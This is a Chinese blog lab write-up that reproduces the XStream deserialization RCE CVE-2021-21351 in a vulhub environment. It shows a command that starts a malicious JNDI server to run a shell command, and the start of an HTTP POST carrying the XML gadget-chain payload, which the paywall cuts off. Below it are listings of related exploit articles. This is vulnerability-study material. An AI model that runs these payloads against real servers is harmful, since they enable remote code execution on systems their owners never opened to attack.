vulhub漏洞复现75_XStream

最新推荐文章于 2024-03-06 08:22:14 发布
最新推荐文章于 2024-03-06 08:22:14 发布
阅读量512 收藏 1
点赞数
文章标签: 安全 java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122916161
版权

一、 CVE-2021-21351_XStream 反序列化命令执行漏洞

前言

XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。

漏洞详情

XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用`javax.naming.ldap.Rdn$RdnEntry`及`javax.sql.rowset.BaseRowSet`构造JNDI注入,进而执行任意命令。

参考链接:

- https://x-stream.github.io/CVE-2021-21351.html

- https://paper.seebug.org/1543/

- https://www.veracode.com/blog/research/exploiting-jndi-injections-java

- https://github.com/welk1n/JNDI-Injection-Exploit/

漏洞环境

靶场:192.168.4.10_ubuntu

攻击机:192.168.4.29_kali

执行如下命令启动一个Springboot + XStream 1.4.15的环境:

#docker-compose up -d

环境启动后,我们向`http://your-ip:8080`发送一个正常的XML数据包,将会得到预期返回:

 

漏洞复现

由于目标环境Java版本高于8u191,故我们需要借助[这篇文章](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)中给出的方法,使用`org.apache.naming.factory.BeanFactory`加EL表达式注入的方式来执行任意命令。

1. 使用[这个工具](https://github.com/welk1n/JNDI-Injection-Exploit/)启动恶意JNDI服务器:

```

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.1.142

```

 

2. 使用上图中基于SpringBoot利用链的RMI地址作为`<dataSource>`的值,构造POC如下:

```

POST / HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: application/xml

Content-Length: 3184

<sorted-set>

  <javax.naming.ldap.Rdn_-RdnEntry>

    <type>ysomap</type>

    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>

      <m__DTMXRTreeFrag>

        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.

最低0.47元/天 解锁文章
Revenge_scan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub复现漏洞 - Nginx 文件名逻辑漏洞CVE-2013-4547)
JiangBuLiu的博客
07-12 839
Nginx 文件名逻辑漏洞CVE-2013-4547)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/nginx/CVE-2013-4547/ 漏洞原理 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 参考链接: http://cve.mitre.or...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1716
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 411
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhubWeblogic(CVE-2017-10271)漏洞复现
qq_45300786的博客
04-10 1230
背景介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 启动vulhub里的weblogic服务 漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType11 漏洞复现 在攻击机用nc监听端口: 用burpsuite发送如下post报文。 (记得把ip(192.168.100.34)
vulhub漏洞复现1
xhscxj的博客
05-23 1940
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
TestXStream_feedxs3_XStream_
10-02
这个"TestXStream_feedxs3_XStream_"项目显然专注于利用XStream库进行XML序列化和反序列化的实践。 首先,让我们深入了解什么是序列化和反序列化。序列化是将对象的状态转化为可存储或可传输的形式的过程,通常用于...
android_xStream
12-19
在Android开发中,数据交换和序列化是常见的需求,XStream是一个强大的库,它使得XML与Java对象之间的转换变得简单易行。本文将深入探讨如何在Android环境中利用XStream库来实现XML到List类的转换。 XStream是一个...
xstream_1.4.3及其依赖包_xstream_1.4.3及其依赖包
09-22
XStream是一个Java库,它能够将Java对象转换为XML,反之亦然,使得数据序列化和反序列化变得简单易行。在标题“xstream_1.4.3及其依赖包”中,提及的是XStream的1.4.3版本,这是一个稳定且广泛使用的版本。该版本...
接口的编写与接收外部接口_xstream
07-20
接口的编写与接收外部接口_xstream(实例,可直接部署运行+说明文档)
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 958
vulhub中ssrf漏洞复现
vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1943
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9086
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1063
vulhub漏洞复现练习篇
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
最新发布
qq_53058639的博客
03-06 1499
如何判断我的服务器是否受到了针对shiro550漏洞的攻击?检查日志:查看系统的日志文件,看是否有异常的访问记录或登录失败记录,如果发现了异常,可以进一步分析该记录是否与Shiro550漏洞有关。检查系统状态:检查系统是否存在异常状态,如系统崩溃、服务宕机等,这可能是攻击者利用Shiro550漏洞进行攻击导致的。检查用户行为:检查是否有用户在短时间内多次尝试登录或者进行异常操作,这可能是攻击者正在利用Shiro550漏洞尝试获取系统权限。
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
一剑开天门!的博客
03-02 5347
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 765
XStream反序列化流程及CVE-2020-26217漏洞分析
xstream 相关漏洞学习
问题很多的小明
05-28 429
参考:https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用 xstream主要作用:类与XML互相转换 引入依赖 <dependencies> <dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId>
xstream漏洞有哪些
04-28
但是,由于 XStream 序列化和反序列化的机制存在一些缺陷,可能会导致安全漏洞。以下是一些已知的 XStream 漏洞: 1. XStream 反序列化漏洞CVE-2013-7285):攻击者可以构造恶意 XML 文件,通过反序列化漏洞实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值